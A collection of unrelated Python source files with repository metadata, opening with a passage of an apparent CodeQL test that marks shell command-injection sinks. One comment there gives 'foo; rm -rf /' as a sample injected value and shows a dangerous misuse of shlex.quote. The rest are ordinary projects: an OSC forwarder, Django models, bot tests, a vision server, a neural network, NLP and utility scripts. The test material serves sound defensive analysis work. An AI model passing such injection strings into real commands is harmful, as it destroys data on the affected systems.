subprocess.Popen(["/bin/bash", "-c", "vuln"]) # $getCommand="/bin/bash" MISSING: getCommand="vuln"
subprocess.Popen(["/bin/dash", "-c", "vuln"]) # $getCommand="/bin/dash" MISSING: getCommand="vuln"
subprocess.Popen(["/bin/zsh", "-c", "vuln"]) # $getCommand="/bin/zsh" MISSING: getCommand="vuln"
subprocess.Popen(["sh", "-c", "vuln"]) # $getCommand="sh" MISSING: getCommand="vuln"
subprocess.Popen(["bash", "-c", "vuln"]) # $getCommand="bash" MISSING: getCommand="vuln"
subprocess.Popen(["dash", "-c", "vuln"]) # $getCommand="dash" MISSING: getCommand="vuln"
subprocess.Popen(["zsh", "-c", "vuln"]) # $getCommand="zsh" MISSING: getCommand="vuln"
# Check that we don't consider ANY argument a command injection sink
subprocess.Popen(["sh", "/bin/python"]) # $getCommand="sh"
subprocess.Popen(["cmd.exe", "/c", "vuln"]) # $getCommand="cmd.exe" MISSING: getCommand="vuln"
subprocess.Popen(["cmd.exe", "/C", "vuln"]) # $getCommand="cmd.exe" MISSING: getCommand="vuln"
subprocess.Popen(["cmd", "/c", "vuln"]) # $getCommand="cmd" MISSING: getCommand="vuln"
subprocess.Popen(["cmd", "/C", "vuln"]) # $getCommand="cmd" MISSING: getCommand="vuln"
subprocess.Popen(["<progname>", "-c", "vuln"], executable="/bin/bash") # $getCommand="/bin/bash" MISSING: getCommand="vuln"
if UNKNOWN:
os.execl("/bin/sh", "<progname>", "-c", "vuln") # $getCommand="/bin/sh" getAPathArgument="/bin/sh" MISSING: getCommand="vuln"
os.spawnl(os.P_WAIT, "/bin/sh", "<progname>", "-c", "vuln") # $getCommand="/bin/sh" getAPathArgument="/bin/sh" MISSING: getCommand="vuln"
########################################
# Passing arguments by reference
args = ["/bin/sh", "-c", "vuln"]
subprocess.Popen(args) # $getCommand=args
args = "<progname>"
use_shell = False
exe = "executable"
subprocess.Popen(args, shell=use_shell, executable=exe) # $getCommand=exe SPURIOUS: getCommand=args
################################################################################
# Taint related
import shlex
cmd = shlex.join(["echo", tainted])
args = shlex.split(tainted)
# will handle tainted = 'foo; rm -rf /'
safe_cmd = "ls {}".format(shlex.quote(tainted))
# not how you are supposed to use shlex.quote
wrong_use = shlex.quote("ls {}".format(tainted))
# still dangerous, for example
cmd = "sh -c " + wrong_use
|
github/codeql
|
python/ql/test/library-tests/frameworks/stdlib/SystemCommandExecution.py
|
Python
|
mit
| 8,427
|
from pythonosc import osc_server
from pythonosc import osc_packet
import threading
import socketserver
import socket
class SimpleUDPClient(object):
def __init__(self, address, port):
self._sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self._sock.setblocking(0)
self._address = address
self._port = port
def send(self, content):
self._sock.sendto(content, (self._address, self._port))
class UDPForwarderHandler(socketserver.BaseRequestHandler):
def handle(self):
data = self.request[0]
self.server.out.send(data)
try:
self.async_print(osc_packet.OscPacket(data))
except osc_packet.ParseError:
pass
def async_print(self, packet):
thread = threading.Thread(target=self.print, args=(packet, self.server.identifier))
thread.daemon = False
thread.start()
def print(self, packet, identifier):
for timed_msg in packet.messages:
vals = ", ".join(map(str, timed_msg.message))
self.server.vals[timed_msg.message.address] = vals
#print("[{0}] [{1}] -- {{{2}}}".format(identifier, timed_msg.message.address, vals))
class OSCUDPServerForwarder(socketserver.UDPServer):
def __init__(self, identifier, server_address, destination):
super().__init__(server_address, UDPForwarderHandler)
self.out = SimpleUDPClient(*destination)
self.identifier = identifier
self.vals = {}
def start(self):
self.thread = threading.Thread(target=self.serve_forever)
self.thread.daemon = True
self.thread.start()
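# Hedged usage sketch (addresses and ports are assumptions, not from this repo):
# server = OSCUDPServerForwarder("in", ("0.0.0.0", 9000), ("127.0.0.1", 9001))
# server.start()  # forwards every OSC packet received on :9000 to :9001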
|
philipbjorge/osc-spy
|
forwarder.py
|
Python
|
mit
| 1,519
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import logging
from django.utils.encoding import python_2_unicode_compatible
from django.db import models
LOG = logging.getLogger(__name__)
@python_2_unicode_compatible
class IndexSpecification(models.Model):
project = models.ForeignKey('sunlumo_project.Project')
name = models.CharField(max_length=50)
layer = models.ForeignKey('sunlumo_project.Layer')
fields = models.ManyToManyField(
'sunlumo_project.Attribute', through='IndexAttribute',
through_fields=('index', 'attribute')
)
def __str__(self):
return '{}'.format(self.name)
@python_2_unicode_compatible
class IndexAttribute(models.Model):
attribute = models.ForeignKey('sunlumo_project.Attribute')
index = models.ForeignKey('IndexSpecification')
primary_key = models.BooleanField(default=False)
ordering = models.IntegerField(default=-1)
def __str__(self):
return '{} ({})'.format(self.index, self.attribute)
class IndexData(models.Model):
index = models.ForeignKey('IndexSpecification')
feature_id = models.TextField()
text = models.TextField()
class Meta:
index_together = [['index', 'feature_id']]
|
candela-it/sunlumo
|
django_project/sunlumo_similaritysearch/models.py
|
Python
|
mit
| 1,234
|
# MIT License
#
# Copyright (c) 2018 Matthew Bedder (matthew@bedder.co.uk)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
Tests for the ``GifBot`` class.
"""
import unittest
from unittest.mock import patch, MagicMock
from gif_bot.gif_bot import GifBot
api_collector = MagicMock()
def mock_api_call(command, *args, **kwargs):
if command == "users.list":
return {
"ok": True,
"members": [
{"name": "test_bot_name", "id": "test_bot_id"},
{"name": "test_owner_name", "id": "test_owner_id"}
]
}
else:
api_collector(command, *args, **kwargs)
def mock_client(_):
return MagicMock(api_call=mock_api_call)
def Any(cls):
class Any(cls):
def __eq__(self, other):
return True
return Any()
@patch("gif_bot.gif_bot.SlackClient", mock_client)
@patch("gif_bot.gif_bot.getLogger")
@patch("gif_bot.gif_bot.Formatter")
@patch("gif_bot.gif_bot.Logger")
@patch("gif_bot.gif_bot.RotatingFileHandler")
class TestGifBot(unittest.TestCase):
def setUp(self):
api_collector.reset_mock()
def test_is_mention(self, *args):
""" The bot should be able to identify direct mentions """
bot = GifBot("test.config", MagicMock())
self.assertTrue(bot.is_mention("@test_bot_name"))
self.assertTrue(bot.is_mention("@test_bot_name help"))
self.assertFalse(bot.is_mention("Something @test_bot_name"))
def test_is_trigger(self, *args):
""" The bot should be able to identify trigger words being used in messages """
bot = GifBot("test.config", MagicMock())
self.assertTrue(bot.is_trigger("test_trigger blah"))
self.assertTrue(bot.is_trigger("blah test_trigger"))
self.assertFalse(bot.is_trigger("something else"))
def test_not_trigger_non_message(self, *args):
""" The bot should ignore non-messages """
bot = GifBot("test.config", MagicMock())
bot.handle_message({
"channel": "test_channel",
"ts": "test_ts"
})
api_collector.assert_not_called()
def test_not_trigger_self(self, *args):
""" The bot shouldn't be able to trigger itself """
bot = GifBot("test.config", MagicMock())
bot.handle_message({
"user": "test_bot_id",
"text": "Something something test_trigger",
"channel": "test_channel",
"ts": "test_ts"
})
api_collector.assert_not_called()
def test_handle_trigger_message(self, *args):
""" The bot should trigger on messages from users containing a trigger word """
bot = GifBot("test.config", MagicMock())
bot.handle_message({
"user": "test_user_id",
"text": "Something something test_trigger",
"channel": "test_channel",
"ts": "test_ts"
})
api_collector.assert_any_call("chat.postMessage", text=Any(str),
channel="test_channel", as_user=True)
api_collector.assert_any_call("reactions.add", name="test_reaction",
channel="test_channel", timestamp="test_ts")
def test_handle_request_success(self, *args):
""" The bot should post a gif and a happy reaction when they can fulfill a request """
bot = GifBot("test.config", MagicMock())
bot.handle_message({
"user": "test_user_id",
"text": "@test_bot_name request tag_a1",
"channel": "test_channel",
"ts": "test_ts"
})
api_collector.assert_any_call("chat.postMessage", text=Any(str),
channel="test_channel", as_user=True)
api_collector.assert_any_call("reactions.add", name="test_reaction",
channel="test_channel", timestamp="test_ts")
def test_handle_request_failure(self, *args):
""" The bot should send a message and react with :brokenheart: when it cannot fulfill a
request """
bot = GifBot("test.config", MagicMock())
bot.handle_message({
"user": "test_user_id",
"text": "@test_bot_name request invalid_tag",
"channel": "test_channel",
"ts": "test_ts"
})
api_collector.assert_any_call("chat.postMessage", text=Any(str),
channel="test_channel", as_user=True)
api_collector.assert_any_call("reactions.add", name="broken_heart",
channel="test_channel", timestamp="test_ts")
def test_admin(self, *args):
""" Test that basic admin commands work """
bot = GifBot("test.config", MagicMock())
self.assertNotIn("tag", bot.store.tags)
self.assertEqual(len(bot.store.elements), 2)
bot.handle_message({
"user": "test_owner_id",
"text": "add url tag",
"channel": "Dtest_channel",
"ts": "test_ts"
})
self.assertIn("tag", bot.store.tags)
self.assertEqual(len(bot.store.elements), 3)
bot.handle_message({
"user": "test_owner_id",
"text": "remove url",
"channel": "Dtest_channel",
"ts": "test_ts"
})
self.assertNotIn("tag", bot.store.tags)
self.assertEqual(len(bot.store.elements), 2)
def test_admin_access(self, *args):
""" Test that basic admin commands work only for the owner """
bot = GifBot("test.config", MagicMock())
self.assertNotIn("tag", bot.store.tags)
self.assertEqual(len(bot.store.elements), 2)
bot.handle_message({
"user": "test_user_id",
"text": "add url tag",
"channel": "Dtest_channel",
"ts": "test_ts"
})
self.assertNotIn("tag", bot.store.tags)
self.assertEqual(len(bot.store.elements), 2)
|
bedder/gifbot
|
test/test_gif_bot.py
|
Python
|
mit
| 7,000
|
import json
from django import template
from django.utils.safestring import mark_safe
register = template.Library()
@register.filter
def jsonify(value):
return mark_safe(json.dumps(value))
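# Template-side usage sketch (an assumption, not from this repo):
# {{ some_value|jsonify }} renders the value as a JSON literal. mark_safe
# skips Django's HTML escaping, so only pass trusted data through this filter.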
|
tayfun/bilgisayfam
|
bilgisayfam/utils/templatetags/jsonify.py
|
Python
|
mit
| 197
|
import cv2
from http.server import BaseHTTPRequestHandler, HTTPServer
from socketserver import ThreadingMixIn
from threading import Thread
import imutils
import sys
import socket
import numpy as np
import time
from operator import itemgetter
import math
import os
from subprocess import Popen, PIPE, STDOUT
import selectors
import threading
__all__ = ["BaseServer", "TCPServer", "UDPServer", "ForkingUDPServer",
"ForkingTCPServer", "ThreadingUDPServer", "ThreadingTCPServer",
"BaseRequestHandler", "StreamRequestHandler",
"DatagramRequestHandler", "ThreadingMixIn", "ForkingMixIn"]
if hasattr(socket, "AF_UNIX"):
__all__.extend(["UnixStreamServer", "UnixDatagramServer",
"ThreadingUnixStreamServer",
"ThreadingUnixDatagramServer"])
# poll/select have the advantage of not requiring any extra file descriptor,
# contrarily to epoll/kqueue (also, they require a single syscall).
if hasattr(selectors, 'PollSelector'):
_ServerSelector = selectors.PollSelector
else:
_ServerSelector = selectors.SelectSelector
def contourArea(contours):
area = []
for i in range(0, len(contours)):
area.append([cv2.contourArea(contours[i]), i])
    # sort by contour area (element 0), not by index, so the last entry is the largest
    area.sort(key=itemgetter(0))
return area[len(area) - 1]
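# Hedged reading (an inference, not documented in the original): an empirical
# cubic fit from detected target width in pixels to distance in inches,
# judging by the "%s in." overlay drawn in realmain().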
def widthDistanceCalc(x):
return -0.0003 * math.pow(x, 3) + 0.0881 * x * x - 10.336 * x + 553.9
class InetChecker:
def __init__(self):
self.inet = False
self.command = 'sudo ping -c 1 192.168.1.1'
#self.command = 'ping -n 1 192.168.1.1'
self.stopped = False
def start(self):
Thread(target=self.update, args=()).start()
return self
def update(self):
while True:
if self.stopped:
return
#response = Popen(self.command, shell=True, stdin=PIPE, stdout=PIPE, stderr=STDOUT).stdout.read().decode()
response = Popen(self.command, shell=True, stdin=PIPE, stdout=PIPE, stderr=STDOUT,close_fds=True).stdout.read().decode()
if ('Network is unreachable' in response):
self.inet = False
else:
self.inet = True
time.sleep(0.8)
def getInet(self):
return self.inet
def stop(self):
self.stopped = True
class SendThread:
def __init__(self, url='', port=8080):
self.UDP_IP = url
self.PORT = port
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.message = ''
self.stopped = False
self.steady = False
def start(self):
Thread(target=self.update, args=()).start()
def update(self):
while True:
if self.stopped:
self.sock.close()
return
if (not self.steady):
self.sock.sendto(self.message.encode(), (self.UDP_IP, self.PORT))
else:
pass
def stop(self):
self.stopped = True
def changeMessage(self, string):
self.message = string
def idle(self):
self.steady = True
class ReceiveThread:
def __init__(self, url='', port=8080):
UDP_IP = url
PORT = port
self.BUFF_SIZE = 1024
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.sock.bind((UDP_IP, PORT))
self.message = ''
self.stopped = False
self.steady = False
def start(self):
# start the thread to read frames from the video stream
Thread(target=self.update, args=()).start()
def update(self):
while True:
if self.stopped:
self.sock.close()
return
if (not self.steady):
data, addr = self.sock.recvfrom(self.BUFF_SIZE)
if (data.decode() != ''):
self.message = data.decode()
else:
self.message = ''
else:
pass
def getMessage(self):
return self.message
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
def idle(self):
self.steady = True
class CamHandler(BaseHTTPRequestHandler):
def do_GET(self):
print(self.path)
if self.path.endswith('/stream.mjpg'):
            self.send_response(200)
self.send_header('Content-type', 'multipart/x-mixed-replace; boundary=--jpgboundary')
self.end_headers()
while True:
try:
r, buf = cv2.imencode(".jpg", frame)
try:
self.wfile.write("--jpgboundary\r\n".encode())
self.end_headers()
self.wfile.write(bytearray(buf))
except KeyboardInterrupt:
pass
except KeyboardInterrupt:
break
return
if self.path.endswith('.html') or self.path == "/":
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
            self.wfile.write('<html><head></head><body>'.encode())
            self.wfile.write('<img src="http://localhost:5810/stream.mjpg" height="480px" width="640px"/>'.encode())
            self.wfile.write('</body></html>'.encode())
return
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
"""Handle requests in a separate thread."""
def serve_forever(self, poll_interval=0.5):
try:
# XXX: Consider using another file descriptor or connecting to the
# socket to wake this up instead of polling. Polling reduces our
# responsiveness to a shutdown request and wastes cpu at all other
# times.
with _ServerSelector() as selector:
selector.register(self, selectors.EVENT_READ)
while True:
if inet:
ready = selector.select(poll_interval)
if ready:
self._handle_request_noblock()
self.service_actions()
else:
pass
finally:
pass
class WebcamVideoStream:
def __init__(self, src=0):
# initialize the video camera stream and read the first frame
# from the stream
self.stream = cv2.VideoCapture(src)
# self.stream.set(3, 1920)
# self.stream.set(4, 1080)
# self.stream.set(15,-100)
(self.grabbed, self.frame) = self.stream.read()
# initialize the variable used to indicate if the thread should
# be stopped
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
Thread(target=self.update, args=()).start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
while True:
# if the thread indicator variable is set, stop the thread
if self.stopped:
self.stream.release()
return
# otherwise, read the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
# return the frame most recently read
return self.frame
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
def realmain():
global frame
global inet
lower_green = (55, 140, 110)
upper_green = (90, 256, 256)
UDP_SEND_PORT = 5800
UDP_COMP_PORT = 5801
UDP_IP = ''
UDP_RIO = '10.54.65.79'
# UDP_RIO = '192.168.43.157'
font = cv2.FONT_HERSHEY_SIMPLEX
send = SendThread(url=UDP_RIO, port=UDP_SEND_PORT)
send.start()
receive = ReceiveThread(url=UDP_IP, port=UDP_COMP_PORT)
receive.start()
ip = ''
cap = WebcamVideoStream(src=0).start()
os.system('v4l2-ctl --set-ctrl brightness=80')
secondcap = WebcamVideoStream(src=1).start()
server = ThreadedHTTPServer((ip, 5810), CamHandler)
inet = False
internet = InetChecker().start()
target = Thread(target=server.serve_forever, args=())
target.daemon = True
print("starting server ")
try:
i = 0
while True:
inet = internet.getInet()
if inet:
img = cap.read()
img1 = secondcap.read()
t = imutils.resize(img, width=640, height=480)
tcam2 = imutils.resize(img1, width=640, height=480)
img2 = cv2.GaussianBlur(t, (5, 5), 0)
hsv = cv2.cvtColor(img2, cv2.COLOR_BGR2HSV)
# construct a mask for the color "green", then perform
# a series of dilations and erosions to remove any small
# blobs left in the mask
mask = cv2.inRange(hsv, lower_green, upper_green)
edged = cv2.Canny(mask, 35, 125)
# find contours in the mask and initialize the current
# (x, y) center of the ball
im2, cnts, hierarchy = cv2.findContours(edged.copy(), cv2.RETR_LIST, cv2.CHAIN_APPROX_NONE)
if (len(cnts) >= 1):
area, place = contourArea(cnts)
if (area >= 100):
maxc = cnts[place]
rect = cv2.minAreaRect(maxc)
box = cv2.boxPoints(rect)
box = np.int0(box)
cv2.drawContours(t, [box], 0, (0, 0, 255), 2)
M = cv2.moments(maxc)
cx = int(M['m10'] / M['m00']) # Center of MASS Coordinates
cy = int(M['m01'] / M['m00'])
rect = cv2.minAreaRect(maxc)
height = rect[1][0]
width = rect[1][1]
widthreal = max(width, height)
heightreal = min(width, height)
distance = widthDistanceCalc(widthreal)
cv2.putText(t, '%s in. ' % (round(distance, 2)), (10, 400), font, 0.5, (0, 0, 255), 1)
send.changeMessage('Y ' + str(cx) + ' ' + str(cy) + ' ' + "{0:.2f}".format(
heightreal) + ' ' + "{0:.2f}".format(widthreal))
else:
send.changeMessage('N')
message = receive.getMessage()
if (message == '2'):
frame = tcam2
elif (message == '1'):
frame = t
elif (message == ''):
frame = tcam2
if (i == 0):
target.start()
i += 1
else:
send.idle()
receive.idle()
    except KeyboardInterrupt:
        cap.stop()
        secondcap.stop()
        internet.stop()
        target.join()
        sys.exit()
if __name__ == '__main__':
realmain()
|
SachinKonan/Windows-RPI-Vision-Framework
|
Combined/visionServer.py
|
Python
|
mit
| 11,133
|
import functools
def concat(li: "list of strings") -> str:
return functools.reduce(lambda a, b: a + b, li)
def compose(*functions):
def compose2(f, g):
return lambda x: f(g(x))
return functools.reduce(compose2, functions)
def thread_compose(*functions):
return compose(*list(reversed(functions)))
def compose_and_call(initial_arg, *functions):
"""Given an initial value and a list of functions,
compose the list of functions and
call the composed function on the initial value."""
workflow = thread_compose(*functions)
return workflow(initial_arg)
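# Usage sketch (not part of the original module):
# add1 = lambda x: x + 1
# dbl = lambda x: x * 2
# compose(add1, dbl)(3)        == add1(dbl(3)) == 7   (right-to-left)
# thread_compose(add1, dbl)(3) == dbl(add1(3)) == 8   (left-to-right)
# compose_and_call(3, add1, dbl) == 8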
|
zekna/py-types
|
py_types/utils.py
|
Python
|
mit
| 596
|
import threading
import queue
import time
import types
def schedule(task):
def send_message(self, message):
self.get_queue().put(message)
def set_queue(self, queue):
self.queue = queue
def get_queue(self):
return self.queue
task.send_message = types.MethodType(send_message, task)
task.set_queue = types.MethodType(set_queue, task)
task.get_queue = types.MethodType(get_queue, task)
task.set_queue(queue.Queue())
def background():
running = True
while running:
task.background()
item = None
try:
item = task.get_queue().get(timeout=1)
except Exception:
swallow = True
            if item is not None:
if item == "kill_thread":
running = False
else:
task.handle_message(item)
task.thread = threading.Thread(target=background)
task.thread.daemon = True
task.thread.start()
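# Hedged usage sketch (`Task` below is hypothetical, not from this repo):
# class Task:
#     def background(self): pass              # polled every loop iteration
#     def handle_message(self, msg): print(msg)
# t = Task()
# schedule(t)                     # starts the daemon worker thread
# t.send_message("hello")         # handled by handle_message on that thread
# t.send_message("kill_thread")   # stops the worker loop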
|
XBigTK13X/wiiu-memshark
|
background/background.py
|
Python
|
mit
| 833
|
def check(cur, uid):
cur.execute("SELECT first_login FROM users WHERE uid=%s", (str(uid),))
result = cur.fetchall()
if len(result) == 0:
return ("This was not found in the database.", 412)
return (str(result[0][0]), 200)
def get(cur, uid, jsonenc):
cur.execute("SELECT * FROM users WHERE uid=%s", (str(uid),))
result = cur.fetchall()
if len(result) == 0:
return ("This was not found in the database.", 412)
username = result[0][1]
email = result[0][3]
jsonresp = jsonenc.encode({"username": username, "email": email})
return (jsonresp, 200)
def save(do, jsondec, cur, uid):
if not do[3]:
return ("No JSON has been passed.", 400)
jsonreq = jsondec.decode(do[3])
email = jsonreq["email"]
username = jsonreq["username"]
cur.execute("SELECT uid FROM users WHERE username=%s", (username,))
results = cur.fetchall()
username_already_taken = False
for result in results:
if result[0] != uid:
username_already_taken = True
cur.execute("SELECT uid FROM users WHERE email=%s", (email,))
results = cur.fetchall()
email_already_in_use = False
for result in results:
if result[0] != uid:
email_already_in_use = True
    if username_already_taken:
        return ("This username is already taken.", 412)
    if email_already_in_use:
        return ("This email is already in use.", 412)
cur.execute("UPDATE users SET email=%s WHERE uid=%s", (email, str(uid)))
cur.execute("UPDATE users SET username=%s WHERE uid=%s", (username, str(uid)))
return ("", 202)
#TODO save the data, confirm the email and so on
def do(cur, uid):
cur.execute("UPDATE users SET first_login = false WHERE uid=%s", (str(uid),))
return ("", 202)
|
YtvwlD/dyluna
|
ajaxmod/first_login.py
|
Python
|
mit
| 1,638
|
#-*- coding:utf-8 -*-
"""
@author: Jeff Zhang
@date: 2017-08-22
"""
import numpy as np
import random
import math
random.seed(0)
# calculate a random number where: a <= rand < b
def rand(a, b):
return (b - a) * random.random() + a
def dtanh(y):
return 1.0 - y ** 2
def sigmoid(sum):
return 1.0 / (1.0 + math.pow(math.e, -1.0 * sum))
class NeuralNetwork:
def __init__(self, input_size, hidden_size, output_size):
# number of input, hidden, and output nodes
self.input_size = input_size + 1 # +1 for bias node
self.hidden_size = hidden_size
self.output_size = output_size
# activations for nodes
self.ai = [1.0] * self.input_size
self.ah = [1.0] * self.hidden_size
self.ao = [1.0] * self.output_size
# create weights
self.Wi = np.zeros([self.input_size, self.hidden_size])
self.Wo = np.zeros([self.hidden_size, self.output_size])
        # set them to random values
for i in range(self.input_size):
for j in range(self.hidden_size):
self.Wi[i][j] = rand(-0.2, 0.2)
for j in range(self.hidden_size):
for k in range(self.output_size):
self.Wo[j][k] = rand(-2.0, 2.0)
def update(self, inputs):
# input activations
for i in range(self.input_size - 1):
self.ai[i] = inputs[i]
# hidden activations
for j in range(self.hidden_size):
sum = 0.0
for i in range(self.input_size):
sum = sum + self.ai[i] * self.Wi[i][j]
self.ah[j] = math.tanh(sum)
# output activations
for k in range(self.output_size):
sum = 0.0
for j in range(self.hidden_size):
sum = sum + self.ah[j] * self.Wo[j][k]
self.ao[k] = sigmoid(sum)
return self.ao[:]
def backPropagate(self, targets, N):
# calculate error terms for output
output_deltas = [0.0] * self.output_size
for k in range(self.output_size):
error = targets[k] - self.ao[k]
output_deltas[k] = error * self.ao[k] * (1 - self.ao[k])
# calculate error terms for hidden
hidden_deltas = [0.0] * self.hidden_size
for j in range(self.hidden_size):
error = 0.0
for k in range(self.output_size):
error = error + output_deltas[k] * self.Wo[j][k]
hidden_deltas[j] = error * dtanh(self.ah[j])
# update output weights
# N: learning rate
for j in range(self.hidden_size):
for k in range(self.output_size):
change = output_deltas[k] * self.ah[j]
self.Wo[j][k] = self.Wo[j][k] + N * change
# update input weights
for i in range(self.input_size):
for j in range(self.hidden_size):
change = hidden_deltas[j] * self.ai[i]
self.Wi[i][j] = self.Wi[i][j] + N * change
# calculate error
loss = 0.0
for k in range(len(targets)):
loss += 0.5 * (targets[k] - self.ao[k]) ** 2
return loss
def fit(self, X, y, iterations=1000, lr=0.5):
for i in range(iterations):
loss = 0.0
for index in range(len(X)):
inputs = X[index]
targets = y[index]
self.update(inputs)
loss += self.backPropagate(targets, lr)
if i % 100 == 0:
print('error %-.5f' % loss)
def predict(self, test_samples):
ypred = []
for index in range(len(test_samples)):
test_label = self.update(test_samples[index])
val = max(test_label)
pred = test_label.index(val)
ypred.append(pred)
# if test_label.index(val) == labels[index].argmax():
# pass
# else:
# err_samples.append([test_samples[index], test_label.index(val), labels[index].argmax()])
# print(test_samples[index],"-->",test_label.index(val) + 1,"<-->",labels[index].argmax()+1)
# print("Error Samples number is ", len(err_samples))
return ypred
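# Hedged usage sketch (an assumption, not part of the original module): learn
# XOR with one-hot targets so predict() can return a class index via argmax.
if __name__ == '__main__':
    X = [[0, 0], [0, 1], [1, 0], [1, 1]]
    y = [[1, 0], [0, 1], [0, 1], [1, 0]]  # one-hot: class 0 = False, class 1 = True
    nn = NeuralNetwork(2, 4, 2)
    nn.fit(X, y, iterations=1000, lr=0.5)
    print(nn.predict(X))  # expected to approach [0, 1, 1, 0]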
|
jfzhang95/lightML
|
SupervisedLearning/NeuralNetwork.py
|
Python
|
mit
| 4,222
|
# -*- coding: utf-8 -*-
"""
Created on Thu Aug 24 01:01:54 2017
@author: Suryansh
"""
# Importing the libraries
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# Importing the dataset
dataset = pd.read_csv('C:/Users/Suryansh/Desktop/Data Science Project/nlp/Natural-Language-Processing/Natural_Language_Processing/Restaurant_Reviews.tsv', delimiter = '\t', quoting = 3)
# Cleaning the texts
import re
import nltk
nltk.download('stopwords')
from nltk.corpus import stopwords
from nltk.stem.porter import PorterStemmer
corpus = []
for i in range(0, 1000):
review = re.sub('[^a-zA-Z]', ' ', dataset['Review'][i])
review = review.lower()
review = review.split()
ps = PorterStemmer()
review = [ps.stem(word) for word in review if not word in set(stopwords.words('english'))]
review = ' '.join(review)
corpus.append(review)
# Creating the Bag of Words model
from sklearn.feature_extraction.text import CountVectorizer
cv = CountVectorizer(max_features = 1500)
X = cv.fit_transform(corpus).toarray()
y = dataset.iloc[:, 1].values
# Splitting the dataset into the Training set and Test set
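# NOTE: on scikit-learn >= 0.20 this import moved to sklearn.model_selection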
from sklearn.cross_validation import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.20, random_state = 0)
# Fitting random forests model to the Training set
from sklearn.ensemble import RandomForestClassifier
classifier=RandomForestClassifier(n_estimators=10,criterion="entropy",random_state=0)
classifier.fit(X_train, y_train)
# Predicting the Test set results
y_pred = classifier.predict(X_test)
# Making the Confusion Matrix
from sklearn.metrics import confusion_matrix
cm = confusion_matrix(y_test, y_pred)
cm
#removing the created objectes after the session is over:
del([X,X_test,X_train,cm,corpus,dataset,i,review,y,y_pred,y_test,y_train])
|
Maverick2024/R-vs-Python-why-you-should-learn-both
|
Python_NLP.py
|
Python
|
mit
| 1,886
|
"""
Compute a hash for a JSON data structure, such that semantically equivalent
JSON structures get the same hash. The notion of "semantic equivalence" is
currently rather basic and informal. Eg, the following are semantically
equivalent, and this is reflected in the computed hashes:
```
d3 = {'d1': {'a': 1, 'b': [1,2]}, 'd2': {'b': [1,2], 'a': 1}, 'L': [1, 2, 3]}
d4 = {'d2': {'b': [1,2], 'a': 1}, 'L': [1, 2, 3], 'd1': {'a': 1, 'b': [1,2]}}
print('d3 hash:', get_json_sem_hash(d3))
print('d4 hash:', get_json_sem_hash(d4))
assert get_json_sem_hash(d3) == get_json_sem_hash(d4)
```
This prints hash value 'e17246aa9136a25581fb859fdeb2dd1da4cda9a221124cd27208646749b85cd7'
for both d3 and d4.
If you find that `get_json_sem_hash()` doesn't return the same hash for 2 json structures
that *you* think are in fact "semantically equivalent", please raise an issue!
The idea for this approach was inspired by https://github.com/fraunhoferfokus/JSum. It
probably needs Python 3.5+ due to type hinting. Clearly the type hinting is not essential,
so if its presence is a hindrance for lots of people, please raise an issue.
(C) Oliver Schoenborn
License: modified MIT, ie MIT plus the following restriction: This code
can be included in your code base only as the complete file, and this
license comment cannot be removed or changed. This code was taken from
https://github.com/schollii/sandals/blob/master/json_sem_hash.py. If you
find modifications necessary, please contribute a PR so that the open-source
community can benefit the same way you benefit from this file.
GIT_COMMIT: <REPLACE WHEN FILE COPIED FROM GITHUB>
"""
from typing import Union, Dict, List
import hashlib
JsonType = Union[str, int, float, List['JsonType'], 'JsonTree']
JsonTree = Dict[str, JsonType]
StrTreeType = Union[str, List['StrTreeType'], 'StrTree']
StrTree = Dict[str, StrTreeType]
def sorted_dict_str(data: JsonType) -> StrTreeType:
if type(data) == dict:
return {k: sorted_dict_str(data[k]) for k in sorted(data.keys())}
elif type(data) == list:
return [sorted_dict_str(val) for val in data]
else:
return str(data)
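# Illustration (not from the original file): sorted_dict_str({'b': 1, 'a': [2, 'x']})
# returns {'a': ['2', 'x'], 'b': '1'} -- keys sorted, leaf values stringified.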
def get_json_sem_hash(data: JsonTree, hasher=hashlib.sha256) -> str:
return hasher(bytes(repr(sorted_dict_str(data)), 'UTF-8')).hexdigest()
|
schollii/sandals
|
json_sem_hash.py
|
Python
|
mit
| 2,297
|
#!/usr/bin/env python
import sys
def brute_force_optimal(string):
"""Return the longest duplicated substring.
Keyword Arguments:
string -- the string to examine for duplicated substrings
This approach examines each possible pair of starting points
for duplicated substrings. If the characters at those points are
the same, the match is extended up to the maximum length for those
points. Each new longest duplicated substring is recorded as the
best found so far.
This solution is optimal for the naive brute-force approach and
runs in O(n^3).
"""
lds = ""
string_length = len(string)
for i in range(string_length):
for j in range(i+1,string_length):
for substring_length in range(string_length-j):
if string[i+substring_length] != string[j+substring_length]:
break
elif substring_length + 1 > len(lds):
lds = string[i:i+substring_length+1]
return lds
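# Illustration (not from the original file): brute_force_optimal("banana")
# returns "ana" -- the two occurrences, at indices 1 and 3, may overlap.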
if __name__ == "__main__":
print(brute_force_optimal(' '.join(map(str, sys.argv[1:]))))
|
taylor-peterson/longest-duplicated-substring
|
longest_duplicated_substring.py
|
Python
|
mit
| 1,103
|
"""
